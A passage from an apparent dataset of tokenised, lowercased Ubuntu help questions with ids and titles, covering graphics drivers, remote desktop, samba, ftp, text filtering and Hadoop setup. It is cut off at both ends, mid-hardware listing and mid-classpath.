bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qm77 express chipset lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 03:00.0 network controller : intel corporation centrino ultimate-n 6300 ( rev 35 ) lshw -c video : *-display description : vga compatible controller product : gf108glm [ nvs 5200m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : f5000000-f5ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f6000000-f607ffff inxi -g graphics : card : nvidia gf108glm [ nvs 5200m ] x.org : 1.14.5 drivers : nouveau ( unloaded : fbdev , vesa , intel ) resolution : 1600x900 @ 60.0hz , 1680x1050 @ 59.9hz glx renderer : gallium 0.4 on nvc1 glx version : 3.0 mesa 10.2.0-devel my friend has an identical laptop - running mint , this is the output from his inxi -g : graphics : card-1 : intel 3rd gen core processor graphics controller card-2 : nvidia gf108glm [ nvs 5200m ] x.org : 1.13.3 drivers : ( unloaded : fbdev , vesa ) failed : nouveau , intel resolution : 1920x1080 @ 60.2hz glx renderer : mesa dri intel ivybridge mobile glx version : 3.0 mesa 9.1.7 ^^^ this is what i would expect to see , both the intel and the nvidia cards - mine is missing the intel one now . notice also that the intel gpu is not listed in my lspci output ! also the first few lines of his lspci : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ^^^ again , this is what i would expect to see ! i 've tried the obvious -- reinstall of the x components including the -intel bits , but it makes no difference , i have tried adding intel section to the xorg.conf , it loads then unloads the intel driver . i guess because it does n't think i have an intel gpu any more ? ! i assume this is because of the horrid kernel level tinkering that the nvidia drivers did ... it is possible to get the intel vga hardware to be detected again ?
438488	using windows rdp to connect to ubuntu 13.10	after i installed xfce4 and xrdp i get a grey screen when attempting to log in to ubuntu 13.10 from windows 8.1 remote desktop . i have ubuntu 13.10 on a microsoft virtual machine . i can not enable sound on the ubuntu virtual machine . i thought if i could access ubuntu via remote desktop i would have sound .
438489	best speech recognition software for ubuntu	can someone please suggest to me a good speech recognition software for ubuntu . i want a software which controls everything . like for example , on the login screen instead of typing password i can say the password and it recognizes my voice and unlocks . i have already tried palaver but it did n't met my needs i want something to do tasks like : search with it , rename file , shutdown my pc , unlock my pc , etc with only my voice and control everything of my pc .
438492	search and print the lines from the output which can contain lines with errors	i have a command example , device list which gives me all devices with their status as okay or error in the following format [ okay ] : you are listening on : 11 [ error ] : not currently listening : 22 [ error ] : not currently listening : 33 [ okay ] : you are listening on : 111 i want to print only devices that has status as okay . i tried using grep command as device list | grep -r 'okay' device list | grep -r ' [ okay ] ' device list | grep -r '^okay' device list | grep 'okay' but it did n't print any output . how can i print the devices with status as okay . thanks in advance .
438497	how to repository ?	i have been trying to setup a pxe server from terminal of another pxe server , at the very beginning i am trying to create repository , i keep on getting this error . sudo : /etc/sudoers is mode 0755 , should be 0440
438499	ca n't type non-english characters in certain places	in certain text fields i ca n't type non-english characters at all ( i type a character , nothing happens ) . examples are : unity dash search field chromium address bar pidgin message box gajim message box on other places ( such as terminal , firefox address bar , input fields on web sites etc ) inputting these characters works . edit : $ locale lang=sr_rs.utf8 @ latin language=sr_rs @ latin : sr_rs : sr : en_us : en lc_ctype= '' sr_rs.utf8 @ latin '' lc_numeric=sr_rs lc_time=sr_rs lc_collate= '' sr_rs.utf8 @ latin '' lc_monetary=sr_rs lc_messages=sr_rs.utf-8 lc_paper=sr_rs lc_name=sr_rs lc_address=sr_rs lc_telephone=sr_rs lc_measurement=sr_rs lc_identification=sr_rs lc_all= $ gsettings list-recursively org.gnome.desktop.input-sources org.gnome.desktop.input-sources current uint32 0 org.gnome.desktop.input-sources per-window false org.gnome.desktop.input-sources show-all-sources false org.gnome.desktop.input-sources sources [ ( 'xkb ' , 'us ' ) , ( 'xkb ' , 'rs+latin ' ) , ( 'xkb ' , 'rs ' ) ] org.gnome.desktop.input-sources xkb-options @ as [ ] $ setxkbmap -query -v trying to build keymap using the following components : keycodes : evdev+aliases ( qwerty ) types : complete compat : complete symbols : pc+us+inet ( evdev ) geometry : pc ( pc105 ) rules : evdev model : pc105 layout : us and when i switch to one of my non-us layouts , i get : $ setxkbmap -query -v trying to build keymap using the following components : keycodes : evdev+aliases ( qwerty ) types : complete compat : complete symbols : pc+rs ( latin ) +us:2+inet ( evdev ) geometry : pc ( pc105 ) rules : evdev model : pc105 layout : rs , us variant : latin , env : $ env | grep -i im clutter_im_module=xim xmodifiers= @ im=ibus editor=/usr/bin/vim im_config_phase=1 qt4_im_module=xim textdomain=im-config xdg_runtime_dir=/run/user/1000 gtk_im_module=xim lc_time=sr_rs
438500	accidentally deleted block special file ( /dev/sdb )	i accidentally deleted block special file /dev/sdb trying to wipe my usb thumbdrive . now /dev/sdb is not listed under fdisk -l , but the thumdrive still opens in file manager when i insert it to the port . so , i want to know if there 's a fix , or what the consequences are ( i ca n't apply operations to dev/sdb in terminal , for one thing ) . many thanks , the command i used to delete was : sudo rm -r -i /dev/sdb
438501	upgrade eclips 3.8 to eclips juno	i use ubuntu 13.04 , please tell me how to upgrade eclips juno , please tell me step by step because i am new on linux . thanx in advance
438505	can i configure dash to not erase the search when i change tabs ?	whenever i use the dash , i want to start typing what i need to search and then look up for the tab on where i need to search it : whether it 's home , applications , files , videos , etc . by switching the tab the dash erases what i had typed , and so i need to type it again in the next tab . i am wondering if it 's possible to have the dash keep what i have typed whenever i hit the ctrl + tab . thank you .
438506	unable to see terminal	i searched for `` terminal '' from `` dash home '' and when i click on it , the black window does not appear . though terminal icon is there in the side bar . when i open it , no such black window appears except the menu bar . what should i do ? one more thing - i open the terminal and switched to 2nd work space . then i clicked the terminal icon . the pc hanged for few seconds . now i can see the terminal with an error message `` the application compiz has closed unexpectedly ''
438508	will `` apt-get upgrade '' update the kernel on lts ?	i am using ubuntu 12.04 lts . my question is : will running `` apt-get upgrade '' update the kernel ? i have read in some untrusted places that only running `` apt-get dist-upgrade '' will update the kernel . is it true ? p.s.logically i do n't think it should update , as it is lts ( stable release ) .
438511	samba shares with windows ad picking wrong username	i have a strange problem , which i have found no answers for on the web . i have ubuntu 12.04 lts with samba 3.6 . 3 ( ntp krb5-user smbfs smbclient winbind ) at first everything works fine , groups in ad have the proper file access and user permissions work , except for one anomaly : there are 2 users with the same first name : simon folly and simon wally if i log into windows as simon wally and try to access his share i get permission denied . when i view samba.log is states : [ 2014/03/24 20:39:04.702632 , 2 ] smbd/service.c:627 ( create_connection_session_info ) user 'windomain\simon folly ' ( from session setup ) not permitted to access this share ( simonw ) as you can see above the wrong username is been authenticated . it 's seems it finds the first name from the list and picks that one . so to test my theory i changed the username in the smb.conf file to `` simon folly '' and sure enough when logged in as simon wally i have full access to my share ? ? has this happened to anyone and how to fix it ? here is my share in smb.conf note : when i change wally to folly then wally has full access . otherwise below gets denied . [ simonw ] comment = simon only path = /sharing/ceo valid users = `` windomain\simon wally '' force group = `` domain users '' writable = yes read only = no force create mode = 0660 create mask = 0777 directory mask = 0777 force directory mode = 0770 access based share enum = yes hide unreadable = yes thank you in advance for your help : )
438512	ubuntu 12.04 lts 2400 hd pro getting tired of trying	i think i have tried every thing to get this to work i 've typed so many command killed ubuntu 3 time i just reinstalled it again and now i 'm asking for some help if any one knows of a walkthrough that works please let me no i do n't want to go back to winhell but i may have to thanks
438513	does gui have shell behind it like terminal ?	in unix , the text we type on terminal window is sent to shell as input . how about gui and tui ? does it have shell too that handles mouse clicks and keyboard ?
438516	need to reasign shortcut keys after every restart to switch language	i have searched all related question but no chance . so it does n't seem to be a duplicate of any question . i 'm using ubuntu 3.10 and i got to text entry settings and assign shift+alt l to switch to next source . it was ok at first , but now , each time i restart my pc , i have to go and reasign the keys again . how to deal with this annoying problem ?
438518	ubuntu asking to `` shut down '' without any existing format	i 've just turned my computer on and am using ubuntu linux 12.10 i believe ... ( the latest version that was mandatory to be upgraded to ) . we 've ran into many troubles in the past and lately when only i 'm on , i seem to get this message saying : '' are you sure you wish to close all tabs and shut down ? '' along with the options available : '' shut down , restart and cancel '' . at this point i only have firefox open and with a few tabs , i chose to cancel and nothing happened , nothing else was exposed or running ... so i do n't know what to do , nor could i provide any help of a screen-shot unless it comes around again , which i doubt since it comes up only if i turn the computer on . now even i have trouble when the page is taking a while to load ever since that popped up . because not being here over the weekend , my father thinks i slow this computer down often , but knowingly he used the pc over the weekend and me just now starting it up and gives me this message ... i just hope i do n't have a sour/bad thumb in this . thanks for you help .
438522	authentication failure for ftp server	i followed this link to install ftp server . and also added ftp user ( ftpuser ) and also added ftp password ( 1234567 ) . but when i am using this password in any wordpress site or any ftp software such as filezilla it is showing 530 login incorrect vsftpd file listen=yes anonymous_enable=no write_enable=yes local_enable=yes dirmessage_enable=yes use_localtime=yes connect_from_port_20=yes ftpd_banner=welcome to blah ftp service . secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
438523	pointer speed ( trackpad ) increases with screen resolution ( independently in x and y )	i 'm experiencing a strange problem ( feature ? ! ) in ubuntu 13.10 on my latitude e4200 : when i plug in an external monitor , extending my desktop , my pointer speed increases in the same direction as my resolution increases . my pointer speed seem to be a percentage of my screen res , but i want it to be a `` per pixel '' speed which is more natural . example : 1 sreen with res 1280 x 800 , relation pointer speed x : y is 1:1 2 screens with 1280 x 800 ( lower ) and 1280 x 1024 ( upper ) making the screen 2x larger in y , relation pointer speed x : y is now roughly 1:2 am i making any sense ? how do i fix this ? thx in advance ! //n
438524	how to edit lightdm.conf file and save it	hello everyone i was searching for login screens like mac and i got this one mac osx login screen but i did everything correct and suddenly it said to edit /etc/lightdm/lightdm.conf this file but i opened it with getid text editor i changed it but it was not saving it and said you do not have permission to edit this file . i checked its permission only root user can edit this but i was not root user . i tried with terminal logged in to root using sudo su command it logged in me to root that file opened in terminal but i was not able to edit it please someone help me in editing it thanks in advance .
438529	how to install a specific printerdriver on ubuntu 13.10	i have a printer called ( canon pixma mx390 series ) it does not appear in the list of printerdrivers when i want to install my printer as a ( samba printer ) .
438532	widgets for desktop in ubuntu ?	libreoffice impress - adding slide themes for the fisrt few seconds of this video we see the presenter 's desktop , displaying what resembles , to me , as widgets like in windows ( 7 namely ) . what is this , and how do i get it ?
438535	filtering a line with sed	i have a file with columns of the form number_number number columns of numbers i want to extract the columns beginning with particular numbers . i tried the following , but get nothing in output : sed -n 's/14_90 2275 . */ & /p' what is wrong with my command ?
438542	put gpu to d3cold	i want to buy a new silent htpc system and wonder whether it is possible to completely power off an ordinary discrete gpu , e.g . a geforce gtx 750 ( this gpu draws its power solely from pci , maybe that helps ) . the processor will be an intel i5 and i want to use the integrated gpu while in linux , but dualboot into windows for occasional gaming . is it possible to completely turn off the discrete gpu in linux ? i already did some research and read about d3cold for pci devices ( there are d3cold_allowed files in /sys/bus/pci/devices/n/ ) , but i could n't find out how to put a device into that state via sysfs . i do n't mind writing a short program in c that uses kernel apis , but do n't know where to begin . other suggestions for turning off a gpu ( or at least put it into some sort of very low power state , disabling fans ) are very welcome . do proprietary gpu drivers from amd/nvidia already offer something similar ? can i send only specific devices to suspend instead of the whole system ?
438543	mobile mass storage is not deducted	i had installed ubuntu 12.04 desktop edition in my asus laptop , while i connect my mobile via mass storage my external card is not deducted . i type the lsusb command in terminal it displays my mobile name . so anyone provide solution for this . thanks & regards sakthiselvan
438546	is it possible to log gmail ?	i want to know if it is possible to log gmail using ubuntu in order to find out that who logged in , honestly my gmail has been hacked and i do n't know the password right now .
438547	hp probook 4520s mobile broadband	i have installed ubuntu 13.10 but it does n't see the mobile broadband on my hp probook 4520s . i do n't know linux very well and have no idea what to do . the internal modem is qualcomm atheros ar9285 . i suspect that i 'm missing a driver . what can i do ? thanks .
438549	disk space is running out	i have installed ubuntu 12.04 and squid 3.1 from the repository . so far so good . i have configured squid to use ~512 mb for disk cache . but found that the system used more than 1 gb of disk space for the last month . my question is : how can i control disk space and will it eventually run out so i have to increase my disk size or is it goingt to reach some maximum value and stay at that level ? forgot to mention that my ubuntu runs in virtualbox . thanks in advance !
438554	samba share permissions	i set up a samba server with a main directory , accessible for users . the directory has subfolders . i want to give a certain user write permissions to one of these subfolders , while he has read permissions to the other subfolders . how should i configure the smb.config file ?
438556	what is the command to search for 64-bit installed java , jre or openjdk ?	i have a question about the following command : apt-cache search java | awk ' { print ( $ 1 ) } ' | grep -e -e '^ ( ia32- ) ? ( sun|oracle ) -java ' -e '^openjdk- ' -e '^icedtea ' -e '^ ( default|gcj ) -j ( re|dk ) ' -e '^gcj- ( . * ) -j ( re|dk ) ' -e 'java-common' owing to my limited it knowledge , am i right to say that the ( ia32- ) in the above command refers to 32-bit software ? if it is , then i assume that the above command is for 32-bit installed os . however i installed a 64-bit os . what is the correct parameter for 64-bit software ? is it ( amd64- ) or ( ia-64 ) or ( x86_64- ) ? any expert help is much appreciated .
438563	ubuntu boots up with full brightness	i have installed ubuntu 13.10 in my samsung laptop , everytime i boot up the system it starts with full screen brightness which is quite annoying in the night . is there a way to fix this problem so that the brightness remains at a level which i set before shutting down the system ?
438565	how to remove title bar of an application in gnome 3.10	i want to remove an application title bar by window id . i do n't want to remove the title bar of all opened windows . i use gnome 3.10 and also i used compizconfig as in : can i hide the title bar of mplayer in gnome ? but it did n't worked for me .
438573	how to batch rename files ( images ) based on csv file	what i have and want to achieve : there are thousands of images in one folder . i have a csv file with following columns : a : original name b : renamed name a typical row looks like this : '' original-1.jpg '' , '' renamed-1.jpg '' '' original-2.jpg '' , '' renamed-2.jpg '' i can remove the quotes , that 's not a problem . now i want to use an app or run a script that will search for all of the images in column a and rename them to names in column b ( e. g. original-1.jpg - > renamed-1.jpg ) . there are some answers around , e. g. : http : //ubuntuforums.org/showthread.php ? t=1069652 http : //systembash.com/content/one-line-batch-rename-files-using-csv-input-file-and-awk/ however , there 's some scripting involved and i 'm not sure if all of those scripts affect only the folder where you store the script or they can rename all of the files on the disk that satisfy certain conditions . of course , latter needs to be avoided . what i am looking for is a simple guide how to rename files and how to choose a folder with files . thank you in advance .
438574	ubuntu , barry-tools and blackberry 8520	this is what i have . ubuntu 13.10 barry-tools ( i do n't remember the version and i am away from my linux pc ) . blackberry curve 8520 what have i done ? my phone was showing me a white screen with a note in black . i do n't remember the message but after a good research the only solution was to make a factory reset . i downloaded barry-tools via apt . then i connected my phone to the linux pc and i did this first : from the command line i typed : bjavaloader -p xxxxx -p xxx wipe because my phone was not starting , i did this too : bjavaloader -p xxxxx -p xxxxx resettofactory . and voila : now i get this error message : reload software 507 . what do i want ? : please , i need to know what tool can i use to reload blackberry software and if possible , give me a very simple example of how to use it . please , try to make this explanation suitable for a `` for dummies '' book .
438575	virtualbox - show mouse	how do you show the mouse in virtual box ( i am emulating a mobile device , it does n't show the mouse which makes it difficult to use )
438576	shut down linux server and turn on automatically at specific time	i 'm having an assignment where the lecturer is asking me to create a bash script to shut down a server at 11pm and turn it on at 6am . i 'm able to do it by using sudo shutdown -h 23:00 and it works . but the problem is that i have no idea how to turn it on automatically on 6am , i could n't find any commands that could do that . any help would be appreciated .
438578	recover files deleted while using xfce	i have moved some files to the trash and i emptied the trash . i would like to recover the files . i am running xfce . i have tried to search in my system with find and locate for the files , without any success . is it possible ?
438582	adding chap iscsi initiator to a preseed file	what is correct preseed syntax for adding chap authentication to install to an iscsi device or where can i find the preseed tags list and usage ?
438584	unable to execute command start-all.sh in hadoop	guys i 'm using this tutorial how to install hadoop ? i mean the one made by luis alvarado in one of the comments .. so i 'm on ubuntu 13.10 64bit hadoop version is 2.2.0 actually i 'm a total newbie on hadoop .. its new for me and we guys are trying to work on some big data related project i count you guys.. help me ! i know tutorial is based on earlier versions of hadoop but i managed to make it through the 11th step ! and the output of the step is root @ sandesh-inspiron-1564 : /home/hduser/hadoop # sudo ./bin/hadoop namenode -format deprecated : use of this script to execute hdfs command is deprecated . instead use the hdfs command for it . 14/03/24 20:29:54 info namenode.namenode : startup_msg : /************************************************************ startup_msg : starting namenode startup_msg : host = sandesh-inspiron-1564/127.0.1.1 startup_msg : args = [ -format ] startup_msg : version = 2.2.0 startup_msg : classpath = /home/hduser/hadoop/etc/hadoop : /home/hduser/hadoop/share/hadoop/common/lib/jsr305-1.3.9.jar : /home/hduser/hadoop/share/hadoop/common/lib/jersey-server-1.9.jar : /home/hduser/hadoop/share/hadoop/common/lib/jasper-runtime-5.5.23.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-io-2.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/netty-3.6.2.final.jar : /home/hduser/hadoop/share/hadoop/common/lib/log4j-1.2.17.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-codec-1.4.jar : /home/hduser/hadoop/share/hadoop/common/lib/slf4j-api-1.7.5.jar : /home/hduser/hadoop/share/hadoop/common/lib/paranamer-2.3.jar : /home/hduser/hadoop/share/hadoop/common/lib/servlet-api-2.5.jar : /home/hduser/hadoop/share/hadoop/common/lib/zookeeper-3.4.5.jar : /home/hduser/hadoop/share/hadoop/common/lib/hadoop-auth-2.2.0.jar : /home/hduser/hadoop/share/hadoop/common/lib/jsp-api-2.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/guava-11.0.2.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-logging-1.1.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-collections-3.2.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/jaxb-api-2.2.2.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-configuration-1.6.jar : /home/hduser/hadoop/share/hadoop/common/lib/protobuf-java-2.5.0.jar : /home/hduser/hadoop/share/hadoop/common/lib/junit-4.8.2.jar : /home/hduser/hadoop/share/hadoop/common/lib/hadoop-annotations-2.2.0.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-el-1.0.jar : /home/hduser/hadoop/share/hadoop/common/lib/jersey-core-1.9.jar : /home/hduser/hadoop/share/hadoop/common/lib/jets3t-0.6.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/stax-api-1.0.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/xmlenc-0.52.jar : /home/hduser/hadoop/share/hadoop/common/lib/jersey-json-1.9.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-compress-1.4.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/jaxb-impl-2.2.3-1.jar : /home/hduser/hadoop/share/hadoop/common/lib/jsch-0.1.42.jar : /home/hduser/hadoop/share/hadoop/common/lib/jackson-mapper-asl-1.8.8.jar : /home/hduser/hadoop/share/hadoop/common/lib/jackson-core-asl-1.8.8.jar : /home/hduser/hadoop/share/hadoop/common/lib/mockito-all-1.8.5.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-lang-2.5.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-beanutils-core-1.8.0.jar : /home/hduser/hadoop/share/hadoop/common/lib/asm-3.2.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-math-2.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/xz-1.0.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-cli-1.2.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-beanutils-1.7.0.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-httpclient-3.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/jackson-jaxrs-1.8.8.jar : /home/hduser/hadoop/share/hadoop/common/lib/activation-1.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/jasper-compiler-5.5.23.jar : /home/hduser/hadoop/share/hadoop/common/lib/jetty-6.1.26.jar : /home/hduser/hadoop/share/hadoop/common/lib/jetty-util-6.1.26.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-digester-1.8.jar : /home/hduser/hadoop/share/hadoop/common/lib/slf4j-log4j12-1.7.5.jar : /home/hduser/hadoop/share/hadoop/common/lib/commons-net-3.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/jackson-xc-1.8.8.jar : /home/hduser/hadoop/share/hadoop/common/lib/avro-1.7.4.jar : /home/hduser/hadoop/share/hadoop/common/lib/jettison-1.1.jar : /home/hduser/hadoop/share/hadoop/common/lib/snappy-java-1.0.4.1.jar : /home/hduser/hadoop/share/hadoop/common/hadoop-nfs-2.2.0.jar : /home/hduser/hadoop/share/hadoop/common/hadoop-common-2.2.0.jar : /home/hduser/hadoop/share/hadoop/common/hadoop-common-2.2.0-tests.jar : /home/hduser/hadoop/share/hadoop/hdfs : /home/hduser/hadoop/share/hadoop/hdfs/lib/jsr305-1.3.9.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/jersey-server-1.9.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/jasper-runtime-5.5.23.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/commons-io-2.1.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/netty-3.6.2.final.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/commons-daemon-1.0.13.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/log4j-1.2.17.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/commons-codec-1.4.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/servlet-api-2.5.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/jsp-api-2.1.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/guava-11.0.2.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/commons-logging-1.1.1.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/protobuf-java-2.5.0.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/commons-el-1.0.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/jersey-core-1.9.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/xmlenc-0.52.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/jackson-mapper-asl-1.8.8.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/jackson-core-asl-1.8.8.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/commons-lang-2.5.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/asm-3.2.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/commons-cli-1.2.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/jetty-6.1.26.jar : /home/hduser/hadoop/share/hadoop/hdfs/lib/jetty-util-6.1.26.jar : /home/hduser/hadoop/share/hadoop/hdfs/hadoop-hdfs-2.2.0-tests.jar : /home/hduser/hadoop/share/hadoop/hdfs/hadoop-hdfs-nfs-2.2.0.jar : /home/hduser/hadoop/share/hadoop/hdfs/hadoop-hdfs-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/jersey-server-1.9.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/commons-io-2.1.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/netty-3.6.2.final.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/log4j-1.2.17.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/paranamer-2.3.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/protobuf-java-2.5.0.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/aopalliance-1.0.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/hadoop-annotations-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/jersey-core-1.9.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/junit-4.10.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/commons-compress-1.4.1.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/javax.inject-1.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/jackson-mapper-asl-1.8.8.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/jackson-core-asl-1.8.8.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/jersey-guice-1.9.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/hamcrest-core-1.1.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/asm-3.2.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/xz-1.0.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/guice-servlet-3.0.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/guice-3.0.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/avro-1.7.4.jar : /home/hduser/hadoop/share/hadoop/yarn/lib/snappy-java-1.0.4.1.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-site-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-server-nodemanager-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-common-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-server-common-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-server-resourcemanager-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-client-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-api-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-server-tests-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-applications-unmanaged-am-launcher-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-server-web-proxy-2.2.0.jar : /home/hduser/hadoop/share/hadoop/yarn/hadoop-yarn-applications-distributedshell-2.2.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/jersey-server-1.9.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/commons-io-2.1.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/netty-3.6.2.final.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/log4j-1.2.17.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/paranamer-2.3.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/protobuf-java-2.5.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/aopalliance-1.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/hadoop-annotations-2.2.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/jersey-core-1.9.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/junit-4.10.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/commons-compress-1.4.1.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/javax.inject-1.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/jackson-mapper-asl-1.8.8.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/jackson-core-asl-1.8.8.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/jersey-guice-1.9.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/hamcrest-core-1.1.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/asm-3.2.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/xz-1.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/guice-servlet-3.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/guice-3.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/avro-1.7.4.jar : /home/hduser/hadoop/share/hadoop/mapreduce/lib/snappy-java-1.0.4.1.jar : /home/hduser/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-examples-2.2.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-client-core-2.2.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-client-common-2.2.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-client-jobclient-2.2.0-tests.jar : /home/hduser/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-client-app-2.2.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-client-hs-2.2.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-client-hs-plugins-2.2.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-client-jobclient-2.2.0.jar : /home/hduser/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-client-shuffle-2.2.0.jar : 